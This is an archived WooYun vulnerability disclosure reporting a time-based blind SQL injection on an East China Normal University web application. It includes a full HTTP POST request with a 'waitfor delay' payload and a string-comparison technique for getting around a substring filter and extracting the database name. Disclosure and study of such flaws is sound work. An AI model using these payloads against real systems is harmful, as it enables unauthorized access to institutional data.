当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152530

漏洞标题:华东师范大学某处sql注入可绕过

相关厂商:华东师范大学

漏洞作者: 路人甲

提交时间:2015-11-08 21:58

修复时间:2015-12-25 08:24

公开时间:2015-12-25 08:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-20: 细节向核心白帽子及相关领域专家公开
2015-11-30: 细节向普通白帽子公开
2015-12-10: 细节向实习白帽子公开
2015-12-25: 细节向公众公开

简要描述:

详细说明:

POST /Able.Acc2.Web/Page_TeachFiles.aspx HTTP/1.1
Content-Length: 3301
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://able.ecnu.edu.cn
Cookie: ASP.NET_SessionId=b3gfzw45bfnu2iqeagrhlq55; AbleAcc2Language=zh-CN
Host: able.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24ContentPlaceHolder1%24btnSearch=%e6%90%9c%e7%b4%a2&ctl00%24ContentPlaceHolder1%24acEndDate=01/01/1967&ctl00%24ContentPlaceHolder1%24acStartDate=01/01/1967&ctl00%24ContentPlaceHolder1%24txtfOrganizationName=iyevrtgt&ctl00%24ContentPlaceHolder1%24txtfTitle=r'if(len(db_name())=4) waitfor delay '0:0:5' -- &ctl00%24Home_Login1%24ImgBtnLogin=&ctl00%24Home_Login1%24txtCode=94102&ctl00%24Home_Login1%24txtLoginID=iyevrtgt&ctl00%24Home_Login1%24txtPassword=g00dPa%24%24w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALyjJjnDwKJicKUAwKC7pXpBwLb9ZTGDQL4naSuCwKN36n1DwKPupWbAgL3uvOGApdkC38vyINV8fHsP83bdFS35W44&__VIEWSTATE=/wEPDwUJNDEzODk5ODk1DxYGHgtfZlNvcnRGaWxlZAULZkNyZWF0ZURhdGUeBl9mU29ydAUEREVTQx4HX1F1ZXJ5XzK0BgABAAAA/////wEAAAAAAAAADAIAAABPQWJsZS5BQ0MuU2hvd1N5c3RlbUNsYXNzLCBWZXJzaW9uPTEuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49bnVsbAwDAAAATlN5c3RlbS5EYXRhLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAKEFibGUuQUNDLlNob3dTeXN0ZW1DbGFzcy50VGVhY2hGaWxlUXVlcnkQAAAADV9mVGVhY2hGaWxlSUQOX2ZUZWFjaExldmVsSUQLX2ZTZWFyY2hLZXkHX2ZUaXRsZRJfZk9yZ2FuaXphdGlvbk5hbWUKX1N0YXJ0RGF0ZQhfRW5kRGF0ZQhfT3JkZXJCeQlfV2hlcmVTdHIRUGFyYW1zQ29sbGVjdGlvbmcLaW5wdXRPdXRwdXQUUXVlcnlCYXNlK19QYWdlSW5kZXgTUXVlcnlCYXNlK19QYWdlU2l6ZRtRdWVyeUJhc2UrUGFyYW1zQ29sbGVjdGlvbmcVUXVlcnlCYXNlK2lucHV0T3V0cHV0FUNsYXNzQmFzZStpbnB1dE91dHB1dAAAAQEBAAABAQMEAAADBAQICA0NHFN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3QeU3lzdGVtLkRhdGEuUGFyYW1ldGVyRGlyZWN0aW9uAwAAAAgIHFN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3QeU3lzdGVtLkRhdGEuUGFyYW1ldGVyRGlyZWN0aW9uAwAAAB5TeXN0ZW0uRGF0YS5QYXJhbWV0ZXJEaXJlY3Rpb24DAAAAAgAAAP//////////BgQAAAAACQQAAAAJBAAAAAAAAAAAAAAAAAAAAAAAAAAJBAAAAAkEAAAACgX7////HlN5c3RlbS5EYXRhLlBhcmFtZXRlckRpcmVjdGlvbgEAAAAHdmFsdWVfXwAIAwAAAAMAAAD//////////woB%2bv////v///8DAAAAAfn////7////AwAAAAsWAmYPZBYEAgEPZBYCAgMPFgIeB2NvbnRlbnQFDOivvueoi%2bS4reW/g2QCAw9kFg4CAQ8PFgIeB1Zpc2libGVoZBYCZg8QDxYGHg1EYXRhVGV4dEZpZWxkBQVmTmFtZR4ORGF0YVZhbHVlRmllbGQFBGZLZXkeC18hRGF0YUJvdW5kZ2QQFQcG5Lit5paHB0VuZ2xpc2gJRnJhbsOnYWlzB0RldXRzY2gJ5pel5pys6KqeDtCg0YPRgdGB0LrQuNC5CEVzcGHDsW9sFQcFemgtQ04FZW4tVVMGZnJlbmNoBmdlcm1hbghqYXBhbmVzZQJSVQdzcGFuaXNoFCsDB2dnZ2dnZ2cWAWZkAgQPFgIeBFRleHQFBuWkp%2bWtpmQCBg8PFgIeDV9TZWxlY3RlZE1lbnUFCEhvbWVQYWdlZBYCZg8PFgQeCENzc0NsYXNzBQlzZWxlY3RuYXYeBF8hU0ICAmRkAggPDxYCHgtfU2VsZWN0ZWRJRAL/////D2QWAmYPFgIeC18hSXRlbUNvdW50AgIWBGYPZBYCAgEPDxYGHwplHgtOYXZpZ2F0ZVVybAUffi9QYWdlX09yZ2FuaXphdGlvbi5hc3B4P0lEPTIyOB8LAgJkFgJmDxUBA%2bezu2QCAQ9kFgICAQ8PFgYfCmUfDgUffi9QYWdlX09yZ2FuaXphdGlvbi5hc3B4P0lEPTIyOR8LAgJkFgJmDxUBCemdnumZouezu2QCCQ9kFgICAg9kFgxmDw9kFgIeCW9ua2V5ZG93bgVAamF2YXNjcmlwdDpyZXR1cm4gU2V0Rm9jdXNOZXh0KCdjdGwwMF9Ib21lX0xvZ2luMV90eHRQYXNzd29yZCcpO2QCAQ8PZBYCHw8FPGphdmFzY3JpcHQ6cmV0dXJuIFNldEZvY3VzTmV4dCgnY3RsMDBfSG9tZV9Mb2dpbjFfdHh0Q29kZScpO2QCAw8PZBYCHw8FQ2phdmFzY3JpcHQ6cmV0dXJuIFJhaXNlQ2xpY2tFdmVudCgnY3RsMDBfSG9tZV9Mb2dpbjFfSW1nQnRuTG9naW4nKTtkAgUPDxYCHgxFcnJvck1lc3NhZ2UFFeivt%2bi%2bk%2bWFpeeUqOaIt%2bWQje%2b8gWRkAgYPDxYCHxAFEuivt%2bi%2bk%2bWFpeWvhuegge%2b8gWRkAgcPDxYCHxAFFeivt%2bi%2bk%2bWFpemqjOivgeegge%2b8gWRkAgsPZBYGAgUPFgIfCGVkAgYPFgIfDWZkAgcPFgIfDWZkAg0PZBYGAgEPFgIfCAUS5Y2O5Lic5biI6IyD5aSn5a2mZAIDDw8WBB8IZR8OZWRkAgUPFgIfCGVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBR1jdGwwMCRIb21lX0xvZ2luMSRJbWdCdG5Mb2dpbt71zHZSnMxixwxm1Gue5d8X8CJy

ctl00%24ContentPlaceHolder1%24txtfTitle参数存在注入

r'if(len(db_name())=4) waitfor delay '0:0:5' --

db长度为4:

11.png

substring被过滤了,使用字符串比较获取数据:
#db第一位:

r'if(db_name()>'a') waitfor delay '0:0:5' --

存在延迟

31.png

r'if(db_name()>'b') waitfor delay '0:0:5' --

不存在延迟

32.png

db第一位为b
如此依次比较就可以获取全部db的数据~

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-10 08:22

厂商回复:

通知二级单位处理。

最新状态:

暂无

漏洞评价:

评价